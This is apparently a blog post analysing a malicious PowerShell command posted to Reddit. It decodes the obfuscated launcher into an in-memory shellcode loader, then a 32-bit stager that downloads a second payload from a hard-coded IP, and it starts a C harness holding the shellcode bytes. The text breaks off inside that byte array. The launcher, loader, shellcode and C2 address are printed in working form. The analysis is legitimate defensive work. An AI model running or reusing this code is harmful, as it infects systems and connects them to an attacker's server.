Table of Contents
A few days back a fellow reddit user asked if a powershell command he found was malicious … I checked, and here is the result ! (spoiler alert : of course if was)
Powershell obfuscation
Here is the original post : https://www.reddit.com/r/Malware/comments/n4zqr6/regshot_meaning/.
The payload is a powershell script in base64, making use of the powershell -enc
option :
C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nop -w hidden -enc $ Q Q 2 w =  4 T A 4 F J O B Z C B 4 D 2 O Y Y K U M D R W U Y G A 4 D Q U T Y H D 2 N Q M C Y H A Y P Q O D 6 D A 5 T W G C 6 T A 4 P Z G B 5 C T M F 4 O B Z D M M D A O Y Y K S 4 D R 7 U Y H S M D Q V F Y H D 2 N Q M B 3 D B J D Q O I S L A 4 T Q O C R H A 4 R E W B Q P A 4 F C G B Z D K M D A 5 G Y G D 4 D Q 7 Q Y G B I P Q V F Y H E M D Q M D Q 7 B K L Q O H 5 D A Y D W G C U L A 4 P Z G B Z H A 4 D I 6 B Y 7 K M D A V G Y K R 4 D R 7 Q Y H U N R Q V E Y H D 5 R Q O J Y H A Z N Q O F 6 T A 6 T W G C 6 P A 4 H 4 G B 4 O T M F C O B Y 6 L M D 2 O Y Y K I 4 D S G Y Y H E 4 D Q X D Y H E J F Q M D U 3 B P B Q O H 4 T A Y F W G B U T A 4 L 5 G B 5 H M M F 4 G B Y P 2 M D Z N G Y K J 4 D R 6 J Y H M K N Q V C Y H D Z F Q P J 3 D B K J Q O I 3 D A 5 F W G B U T A 4 L W G B Q K T M F 4 6 B Y 7 2 M D A W B Y K S 4 D R 6 F Y H U 4 D Q W H Y H D Z F Q M C Y H B J H Q O D Q 7 A 4 T B 6 C S 3 A 4 R W G B Q T A 4 F J W B Y S L M D U 5 G Y G S 4 D R 6 F Y G B M D Q X S Y H D 4 L Q M D Q 7 B J H Q O I S 3 A 6 R B 6 C U X A 4 R S O B Q G D 4 F C G B Y P 2 M D 2 F G Y K S 4 D R 7 Q Y H J 2 N Q U Y Y H D 4 L Q M D U 3 B J N Q O H 4 T A 6 R B 6 C S H A 4 J Z G B Q T M M F G G B Z D A 4 D A 5 G Y K J 4 D R 6 Y Y H J 2 N Q V G Y H D 7 R Q P J Y H B J T Q O H S 3 A 6 T B 6 C U T A 4 R 2 G B 5 C D 4 D K O B Z D K M D A O Y Y K J M D R 4 W Y H U 5 R Q M J Y H B 2 N Q O J Y H A Y T Q O D 3 D A 6 T W G C U T A 4 R 2 G B 2 2 D 4 F Q W B Y 3 A 4 D Z G B Y L C 4 D R O F Y H S 4 D Q W C Y H D K N Q M D Y H B K L Q O H U 3 A 6 T W G B U T A 4 R V G B 5 C T M F K G B Y P E 4 D S O B Y G L 4 D R F C Y H S K N Q X Q Y H D 4 L Q M D Q 7 B P B Q O D 6 D A 6 J Q O C V D A 4 P 6 G B 5 C T M F E 6 B Z D K M D A 5 G Y G L M D Q 6 B Y H E Y P Q M S Y H D 6 J Q M C Q 7 B P F Q O E S 3 A 5 R W G C 3 D A 4 N Q O B 3 H A 4 F Q W B Y 3 M M D W G Y Y K B 4 D S G B Y G B K N Q V C Y H D 6 J Q O T Q 7 B K T Q O H 2 T A Y H B 6 B R H A 4 H Q O B 2 L M M C 7 Q =  ; $ C r t 9 8 9 =  M d m f n F R p 9 1 T J N v o n q 7 u g / N 0 q j p u + M j j U a b t 9 r p M N N W T 6 x b r y j 9 d v e h 1 m H i c U t X A V t X T z v Z L L s H v d y Z 9 m p C u + R u J P 6 w N 1 y 7 I 0 j q 2 2 Y l + 9 O l T r f 2 t C Z 3 S i G 2 K N t 2 O + F I 4 S O 5 t V u h Z f W w r e h v c q e 6 k N v r Y D h n p l p s r k b 7 a V 2 W Z m e 0 n M W + 4 e j M R + O z e N b 3 z m k I v k + K y N D S p 3 J H p + u y H 7 a n j t B V R L V i I v n U N P u y S u p z 1 z g 3 y K A 3 V 8 L K 1 p D G t W 1 x 4 b p a o 8 j X p / y J n o j S P S w O p 8 j l i 0 8 z / L Z p o u 3 G L o l B V 3 s b n / b 7 Z b O q M 3 b 0 2 o f C + V x 9 M s f h q t k Y D 9 D T s a G z R d Q 8 H O s D c 9 B Z i s H C U 0 r a C f B g a b R R G 3 O F z q e l s b X t R 2 v I 0 F t j O 5 g r n l v 1 m o a B + / S I V 5 P 1 c k q W z C s v u / x h M j 3 W p / 4 c C o Z Q 1 Y o b n d T 6 o W w a i 1 4 9 J O u S t u n v D O 2 8 0 +  ; $ r t t 8 9 i =  5 M H C p c H I g 8 H p 2 M K o w c b U w Y H B w p P B x 6 b B g s H B h 8 H D 8 M H Z 2 M L 0 w c f k w e i m w v H B y N j B g d j C p c H H 9 M H k w c K l w c e m w Y H Y w p H B y J L B y c H C i c H I k s G D w c K I w c j U w Y O m w Y f B w / D B g o f C p c H I w c G D h 8 K l w c f o w Y H Y w q L B x + T B y c H B o 8 H H 1 M G C p s K j w c f w w e j Y w q T B x 9 j B y c H B l s H F 9 M H p 2 M L z w c P w w e O m w o n B x 5 b B 6 d j C k c H I 2 M H J w c L j w c i S w Y O m w v D B x + T B g t j B p M H F 9 M H p 2 M L w w c P 0 w e W m w p P B x 8 n B 2 K b C o s H H k s H p 2 M K k w c j Y w d L Y w a T B x d j B g q b C 8 8 H H 9 M G C w c K l w c f F w e n B w s f B x 5 L B g s H C k 8 H D h 8 H J h 8 K W w c j Y w Y T B w q b B x J b B 0 6 b B p c H H x c G C w c L y w c f F w Y O H w p P B y J b B 6 I f C p c H I y c G B h 8 K I w c P 0 w e i m w q X B x / D B 0 6 b C m M H H x c G D p s K W w c f k w e i H w p H B x O T B h N j C m M H I w c G D p s K T w c f Y w d O m w q b B x / j B 6 c H C m c H H l s H p h 8 K k w c j o w e i H w a n B y N T B g d j C k s H H l s H p 2 M G J w c O m w c n B w Y n B w 9 j B 6 d j C p M H I 6 M H W h 8 L C w c b B w e T B w s X B x c X B 5 c H C w s H G p s G D w c K l w c e m w e n Y w a T B y N T B 6 K b C q M H D y c H J w c G X w c S i w e S m w v D B x 8 X B g 4 f C 8 M H D 8 M H k w c K o w c f 4 w e i m w p P B y N T B g 6 b B l s H D w c H J h 8 G S w c f k w Y K H w v L B x J b B 2 N j C 2 M H G w c H Z w c L C w c b Y w d j Y w o P B y M H B g q b C o s H H 5 M H T h 8 K p w c f U w Y O H w Y n B w 8 H B 0 t j B f g g f  ; $ b 7 7 H 9 =  + A O A + o T D T H / F u 4 l + w m l 1 6 V b j g 0 n J t A g u 0 D D X H G x R h C N W c l x P a J j 8 a w Q 8 w Y h / S k n L U Q p H D m I F E J O Y C b m Q v F j z X h 6 7 t / 1 k c 0 r 2 J c t l 2 I L r J M q J F F k Q s 2 5 n q h E b s j E e v o / w L 6 d k 8 u h i L m 6 k f Q B N A h A o Y 6 f 4 1 T i + V D X 0 r l f h P e / w f u 5 x P w E s + X h a y I z y U F 8 F s 9 + f F w S S y 2 + X L 6 + c 5 k w 5 / n A m u Q 5 l o g Y r v F K U s Y y 6 c K Y 9 A X 4 W 8 s 2 H e r 9 A y n J E f y G 8 F u Q i u y 0 6 / p T f 9 8 r D L U W m 3 S l h k A i M 9 I a I 0 E z S E P q r 8 B u S o p y Q 9 B b g 2 m P S F F v 9 i T o I s y Z a 1 I y T U G f 7 C c d a z C S m V i 6 x r n 4 a z z f W x W F S o U f V 4 o H H f d j + 4 O g j y w S n Q Y w h m I 9 H o j g V 5 R p p 9 + a b Z d l a b O k v Q I v 7 Y y l w 5 Q a v 9 F R t 0 p 1 Q X T 0 M g 2 Q O n P m P c 0 S C w V 1 a D R X a k l f q W W z p t q W X W i u 3 F 2 8 U Y m d z q o 0 Q + Z o t l j u p v H U o i Q 6 K m 8 Z p 7 C g 1 i r i F n h Q k C C 0 1 v J M W d D + f E F F p 1 Z a B G O I C 8 J v R y X h V I D Y K G z O V c v 0 x d 2 u X m g u p U h 4 6 E R R R x D a v c L O 2 B R F 2 a 7 W I u o c 2 Y q s j N h X c m a K h I f G B R 8 y 9 Z k K s f 2 S Y b Y g d h g J I c C p n i p K B W z c w x R i j e 2 + A C h r c l g o F B q h e p A Q i l q B r X o j v r T l K 5  ; $ d t y t =  w H i + 3 U 4 s k 6 H 9 t d w a j w W s 3 D W 7 t 4 F C a T z f a J U e 2 t f J q 9 8 d q s P W e 7 g m j 6 D x O d 1 t + e p l J z o T 7 1 F 4 O e s h 4 + g M 4 b g y V R Q a f o I D q C C G r p m o I A M l H L u 7 U r T S j o c B 4 k q h b E s i r N C Q a d C g I Y i b F W o V 7 Z J N F q b 9 4 l k S Z G / E r Q s b q O H o h b M A q F U Z J H 4 T T Y d 4 q Q q + r I F N Z k s B z E 1 S i p L S H 6 U F l + 1 6 Q M k c d 2 i E L F g U b j d k 1 I j i d d 2 4 W J Q 2 K P T O b z D v e A P R t T 6 P 6 g P 7 w V V 4 F S R 4 s b n N 9 0 G t B u X Z q g F 7 h E F j C s l D 8 d Z b l 3 Q + h q L n v a B p B c 7 9 Z L h u + d 3 M 3 w y 5 c N b O 9 a y + P i m h 9 g 2 / R 3 O a 5 4 q h S L x f g / X 8 y m / p y W l u O e M + / h c n E T 9 A H J x 5 V o s t K N f S + w L f x / T M B P i / 5 3 a m P y k j 7 q n b o E 0 O d 8 Z V P p b 6 m U b H A f 5 h l 5 g 6 8 E f O Q a 2 b g 3 Z D 7 y / M e 9 s 4 V P i u S O z N y j L C d 3 V t w 9 4 n 5 w j 7 A 9 g V X K 8 F 3 h m U F 8 Y X K X z 6 T v X I T I x f E 7 N 8 M a h j b 3 s e 9 s 4 S b E 0 P f E o Z M g s T H M / Q s N Y h K k d w 0 A A A = =  ; $ a D r 5 =  H 4 s I A A A A A A A A A K 1 X a 2 / i S h L 9 H H 6 F P 0 Q C F M L T v E Y a a W z A Y M L b Y B 6 5 U d T Y b d P Q f u D 2 A 3 J n / v u W D e R m d j K 7 I + 1 G Q m m 3 q 6 p P n z p d X V a w / 6 j 4 H t H 8 o a N j 7 l H F H i O O z Z V T q f u 2 I / v c V + 5 b O m U E t u b H 0 / H g 1 c T + q + s 5 2 i v S d Q 8 z x v 2 d u p s g D 1 l c 5 j 5 E 3 q v l 6 A H F O S 5 5 i A 2 x H n g 4 e 3 e X u k u m A p s h A 7 / a y C c h f r W w v 3 N 0 B g t l n g X X b T s W I v b L l y + t w P O w 7 V + e 8 1 3 s C 4 x h a 0 s J Z p k s 9 5 1 b 7 r C H H 8 f b P d Z 8 7 m / u / j X f p c 4 W 0 a v Z u Y W 0 H W x I s P X 4 3 c D R U L y D v O J S 4 m f S f / 2 V z j 4 / l l 7 y n W O A K M u k l T P z s Z X X K U 1 n u R / Z e M H 5 2 c W Z 9 J B o n s M c w 8 8 v i V 0 p 5 x c J + l E C f n j B n s 5 e d 2 a 6 C P b x + 0 3 G U S 8 + m T Q M J 8 C N c O E w n e O e 4 / W e X 1 6 4 b + 9 o Z o H t E w v n Z d v H n u M q 2 A u J h l m + h 2 y d 4 h k 2 w C 3 N I H 2 2 m c 4 C C A / 7 g W d z N y z g F z o H n L m 3 A 0 p z E P f 5 T + O + Z E Y 4 u p H 7 p 0 6 Z j 0 5 g N f G 9 b O 6 q i T + h Y 5 j o 5 h I O t v M L + g / i y s L f L w L L p n 6 k P p G q j i k 2 k Y 9 f f e D 3 g 1 Z T d 3 f P y R D D f j I T h 5 H E 7 y t X z H F D A I F 8 x z v H 6 Z x 7 A c 6 + / J O f y 7 I 3 T 5 b 7 b a D S z e v q c 0 n P B c d X 7 l l 1 i P 6 S u s u m r u q J 5 1 + 3 A a E 6 9 u L 3 v z 8 N b W w Q G 7 f P N r K I d h N 8 5 r O c Y Y P i h I / 8 z W w E O D P p 6 w u s t 6 / s p G N C n 3 9 1 6 1 j E f / c V L + A E D f L O A B V I I v s z m E s O M 2 n Z H m I L + L s 8 g 0 z v D T h m + G Z 9 P V r n 2 + r x c 6 z l F k W M 5 b h J A O d c y 3 E K R h T r O U 6 w G b m + E g L f S Y b p f  ; $ 6 h u = " $ a D r 5 " + " $ b 7 7 H 9 " ; $ 5 u i = " $ C r t 9 8 9 " + " $ d t y t " ; $ r t t 8 9 i = " $ 6 h u " + " $ 5 u i " ; $ s = N e w - O b j e c t   I O . M e m o r y S t r e a m ( , [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( " $ r t t 8 9 i " ) ) ; I E X   ( N e w - O b j e c t   I O . S t r e a m R e a d e r ( N e w - O b j e c t   I O . C o m p r e s s i o n . G z i p S t r e a m ( $ s , [ I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ; 
The -w hidden
option hides the powershell window, making is more stealthy. This commands hides its content, and it execution : already looks phishy.
Decoding the base64 is quite simple : we end-up with a widestring (utf16-le) powershell script, but some characters are not ASCII (character code 0x2016). It’s actually a different kind of “nice” double quote, replacing it with a real one is quite easy. We end up with a one-liner script, for readability it is easy to replace every “;” with newline. This script concatenates base64 strings, then decodes it, unzip it, and finally runs the result again in powershell :
$QQ2w="4TA4FJOBZCB4D2OYYKUMDRWUYGA4DQUTYHD2NQMCYHAYPQOD6DA5TWGC6TA4PZGB5CTMF4OBZDMMDAOYYKS4DR7UYHSMDQVFYHD2NQMB3DBJDQOISLA4TQOCRHA4REWBQPA4FCGBZDKMDA5GYGD4DQ7QYGBIPQVFYHEMDQMDQ7BKLQOH5DAYDWGCULA4PZGBZHA4DI6BY7KMDAVGYKR4DR7QYHUNRQVEYHD5RQOJYHAZNQOF6TA6TWGC6PA4H4GB4OTMFCOBY6LMD2OYYKI4DSGYYHE4DQXDYHEJFQMDU3BPBQOH4TAYFWGBUTA4L5GB5HMMF4GBYP2MDZNGYKJ4DR6JYHMKNQVCYHDZFQPJ3DBKJQOI3DA5FWGBUTA4LWGBQKTMF46BY72MDAWBYKS4DR6FYHU4DQWHYHDZFQMCYHBJHQODQ7A4TB6CS3A4RWGBQTA4FJWBYSLMDU5GYGS4DR6FYGBMDQXSYHD4LQMDQ7BJHQOIS3A6RB6CUXA4RSOBQGD4FCGBYP2MD2FGYKS4DR7QYHJ2NQUYYHD4LQMDU3BJNQOH4TA6RB6CSHA4JZGBQTMMFGGBZDA4DA5GYKJ4DR6YYHJ2NQVGYHD7RQPJYHBJTQOHS3A6TB6CUTA4R2GB5CD4DKOBZDKMDAOYYKJMDR4WYHU5RQMJYHB2NQOJYHAYTQOD3DA6TWGCUTA4R2GB22D4FQWBY3A4DZGBYLC4DROFYHS4DQWCYHDKNQMDYHBKLQOHU3A6TWGBUTA4RVGB5CTMFKGBYPE4DSOBYGL4DRFCYHSKNQXQYHD4LQMDQ7BPBQOD6DA6JQOCVDA4P6GB5CTMFE6BZDKMDA5GYGLMDQ6BYHEYPQMSYHD6JQMCQ7BPFQOES3A5RWGC3DA4NQOB3HA4FQWBY3MMDWGYYKB4DSGBYGBKNQVCYHD6JQOTQ7BKTQOH2TAYHB6BRHA4HQOB2LMMC7Q="
$Crt989="MdmfnFRp91TJNvonq7ug/N0qjpu+MjjUabt9rpMNNWT6xbryj9dveh1mHicUtXAVtXTzvZLLsHvdyZ9mpCu+RuJP6wN1y7I0jq22Yl+9OlTrf2tCZ3SiG2KNt2O+FI4SO5tVuhZfWwrehvcqe6kNvrYDhnplpsrkb7aV2WZme0nMW+4ejMR+OzeNb3zmkIvk+KyNDSp3JHp+uyH7anjtBVRLViIvnUNPuySupz1zg3yKA3V8LK1pDGtW1x4bpao8jXp/yJnojSPSwOp8jli08z/LZpou3GLolBV3sbn/b7ZbOqM3b02ofC+Vx9MsfhqtkYD9DTsaGzRdQ8HOsDc9BZisHCU0raCfBgabRRG3OFzqelsbXtR2vI0FtjO5grnlv1moaB+/SIV5P1ckqWzCsvu/xhMj3Wp/4cCoZQ1YobndT6oWwai149JOuStunvDO280+"
$rtt89i="5MHCpcHIg8Hp2MKowcbUwYHBwpPBx6bBgsHBh8HD8MHZ2ML0wcfkweimwvHByNjBgdjCpcHH9MHkwcKlwcemwYHYwpHByJLBycHCicHIksGDwcKIwcjUwYOmwYfBw/DBgofCpcHIwcGDh8KlwcfowYHYwqLBx+TBycHBo8HH1MGCpsKjwcfwwejYwqTBx9jBycHBlsHF9MHp2MLzwcPwweOmwonBx5bB6djCkcHI2MHJwcLjwciSwYOmwvDBx+TBgtjBpMHF9MHp2MLwwcP0weWmwpPBx8nB2KbCosHHksHp2MKkwcjYwdLYwaTBxdjBgqbC88HH9MGCwcKlwcfFwenBwsfBx5LBgsHCk8HDh8HJh8KWwcjYwYTBwqbBxJbB06bBpcHHxcGCwcLywcfFwYOHwpPByJbB6IfCpcHIycGBh8KIwcP0weimwqXBx/DB06bCmMHHxcGDpsKWwcfkweiHwpHBxOTBhNjCmMHIwcGDpsKTwcfYwdOmwqbBx/jB6cHCmcHHlsHph8KkwcjoweiHwanByNTBgdjCksHHlsHp2MGJwcOmwcnBwYnBw9jB6djCpMHI6MHWh8LCwcbBweTBwsXBxcXB5cHCwsHGpsGDwcKlwcemwenYwaTByNTB6KbCqMHDycHJwcGXwcSiweSmwvDBx8XBg4fC8MHD8MHkwcKowcf4weimwpPByNTBg6bBlsHDwcHJh8GSwcfkwYKHwvLBxJbB2NjC2MHGwcHZwcLCwcbYwdjYwoPByMHBgqbCosHH5MHTh8KpwcfUwYOHwYnBw8HB0tjBfggf"
$b77H9="+AOA+oTDTH/Fu4l+wml16Vbjg0nJtAgu0DDXHGxRhCNWclxPaJj8awQ8wYh/SknLUQpHDmIFEJOYCbmQvFjzXh67t/1kc0r2Jctl2ILrJMqJFFkQs25nqhEbsjEevo/wL6dk8uhiLm6kfQBNAhAoY6f41Ti+VDX0rlfhPe/wfu5xPwEs+XhayIzyUF8Fs9+fFwSSy2+XL6+c5kw5/nAmuQ5logYrvFKUsYy6cKY9AX4W8s2Her9AynJEfyG8FuQiuy06/pTf98rDLUWm3SlhkAiM9IaI0EzSEPqr8BuSopyQ9Bbg2mPSFFv9iToIsyZa1IyTUGf7CcdazCSmVi6xrn4azzfWxWFSoUfV4oHHfdj+4OgjywSnQYwhmI9HojgV5Rpp9+abZdlabOkvQIv7Yylw5Qav9FRt0p1QXT0Mg2QOnPmPc0SCwV1aDRXaklfqWWzptqWXWiu3F28UYmdzqo0Q+ZotljupvHUoiQ6Km8Zp7Cg1iriFnhQkCC01vJMWdD+fEFFp1ZaBGOIC8JvRyXhVIDYKGzOVcv0xd2uXmgupUh46ERRRxDavcLO2BRF2a7WIuoc2YqsjNhXcmaKhIfGBR8y9ZkKsf2SYbYgdhgJIcCpnipKBWzcwxRije2+AChrclgoFBqhepAQilqBrXojvrTlK5"
$dtyt="wHi+3U4sk6H9tdwajwWs3DW7t4FCaTzfaJUe2tfJq98dqsPWe7gmj6DxOd1t+eplJzoT71F4Oesh4+gM4bgyVRQafoIDqCCGrpmoIAMlHLu7UrTSjocB4kqhbEsirNCQadCgIYibFWoV7ZJNFqb94lkSZG/ErQsbqOHohbMAqFUZJH4TTYd4qQq+rIFNZksBzE1SipLSH6UFl+16QMkcd2iELFgUbjdk1Ijidd24WJQ2KPTObzDveAPRtT6P6gP7wVV4FSR4sbnN90GtBuXZqgF7hEFjCslD8dZbl3Q+hqLnvaBpBc79ZLhu+d3M3wy5cNbO9ay+Pimh9g2/R3Oa54qhSLxfg/X8ym/pyWluOeM+/hcnET9AHJx5VostKNfS+wLfx/TMBPi/53amPykj7qnboE0Od8ZVPpb6mUbHAf5hl5g68EfOQa2bg3ZD7y/Me9s4VPiuSOzNyjLCd3Vtw94n5wj7A9gVXK8F3hmUF8YXKXz6TvXITIxfE7N8Mahjb3se9s4SbE0PfEoZMgsTHM/QsNYhKkdw0AAA=="
$aDr5="H4sIAAAAAAAAAK1Xa2/iShL9HH6FP0QCFMLTvEYaaWzAYMLbYB65UdTYbdPQfuD2A3Jn/vuWDeRmdjK7I+1GQmm3q6pPnzpdXVaw/6j4HtH8oaNj7lHFHiOOzZVTqfu2I/vcV+5bOmUEtubH0/Hg1cT+q+s52ivSdQ8zxv2dupsgD1lc5j5E3qvl6AHFOS55iA2xHng4e3eXukumApshA7/ayCchfrWwv3N0BgtlngXXbTsWIvbLly+twPOw7V+e813sC4xha0sJZpks951b7rCHH8fbPdZ87m/u/jXfpc4W0avZuYW0HWxIsPX43cDRULyDvOJS4mfSf/2Vzj4/ll7ynWOAKMuklTPzsZXXKU1nuR/ZeMH52cWZ9JBonsMcw88viV0p5xcJ+lECfnjBns5ed2a6CPbx+03GUS8+mTQMJ8CNcOEwneOe4/WeX164b+9oZoHtEwvnZdvHnuMq2AuJhlm+h2yd4hk2wC3NIH22mc4CCA/7gWdzNyzgFzoHnLm3A0pzEPf5T+O+ZEY4upH7p06Zj05gNfG9bO6qiT+hY5jo5hIOtvML+g/iysLfLwLLpn6kPpGqjik2kY9ffeD3g1ZTd3fPyRDDfjITh5HE7ytXzHFDAIF8xzvH6Zx7Ac6+/JOfy7I3T5b7baDSzevqc0nPBcdX7ll1iP6SusumruqJ51+3AaE69uL3vz8NbWwQG7fPNrKIdhN85rOcYYPihI/8zWwEODPp6wust6/spGNCn39161jEf/cVL+AEDfLOABVIIvszmEsOM2nZHmIL+Ls8g0zvDThm+GZ9PVrn2+rxc6zlFkWM5bhJAOdcy3EKRhTrOU6wGbm+EgLfSYbpf"
$6hu="$aDr5"+"$b77H9"
$5ui="$Crt989"+"$dtyt"
$rtt89i="$6hu"+"$5ui"
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("$rtt89i"))
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
Extracting the decoded payload is as simple as removing the “IEX” in the last line : the script will be emitted as output from the last command. We can just run the modified script, and redirect the result to a file. We obtain yet another powershell script, but this time it looks quite different :
Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWhQAAAAU1BoV4mfxv/V63BbMdJSaAACYIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8vVkFaawCunVrN41b43PhiRt08JsEgg49a7D5jvg1N9tpOqlwNZz6xkRcXKsG73SJDG+6EsBqblXusY5xhIg2pkd2EQH6AD1pZF4kjfpnEAFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvDQoAGSBV3gaIx9gJIVi7Tpfy8iLHTSv3bfFO6b0Uppc8047Q4xlxiSGkUkxwp40KRezZ9abZn1BuGczOxjjW95dssqrDk/yy5KgOvX98OLaKq8dsUw9kq7LgLEWBuUrS1cxsaWeFNZV8TSlTQ1OmbJwY9Xaz8bLTSrp5r9ffeJlqeXPYWQiWsr2WG4kPQq7QtTneMA5c0Zdi6JvIgfUH7viY1cZJhfcyhcn+mshV0xmyqDGAf34c6rebn0qAPPZbKslcz2xRz4cRDTsh/Bgt+Pdl7zKQF9UVKJULHSYM+ABo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//NDYuMTAxLjE0MS45NgAYiLWL')
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@
If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
IEX $DoIt
}
There is a lot going on there, but it is not necessary to understand everything. There are mentions of system functions (kernel32.dll
, VirtualAlloc
, FunctionPointer
, …), and a base64 encoded string : we can assume this is machine code. In the last lines, we see the script checking the pointer size, and running the DoIt
script always in 32 bits. It is then very likely that the base64 encoded string is a 32 bits x86 shellcode, which we can confirm by simply opening it in IDA (make sure to choose 32 bits !):
Analysing the shellcode
First impressions
We are face to a 800 bytes shellcode, so it can’t really do anything on its own, it’s too short. It is very likely that this is only a first stage infection : its goal would be to download a second stage from another source, and run it. This assumption can be confirmed by looking at the strings:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
46.101.141.96
We have a user-agent, and an ip address (server name) : it is definitely going to download something. I like to debug the program I reverse while I read its assembly on IDA, so here is a C program that runs the shellcode:
// i686-w64-mingw32-gcc.exe -nostdlib -nostartfiles -Wl,--entry=__start main.c -o exec.exe
char array[] = {0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x50, 0x00, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 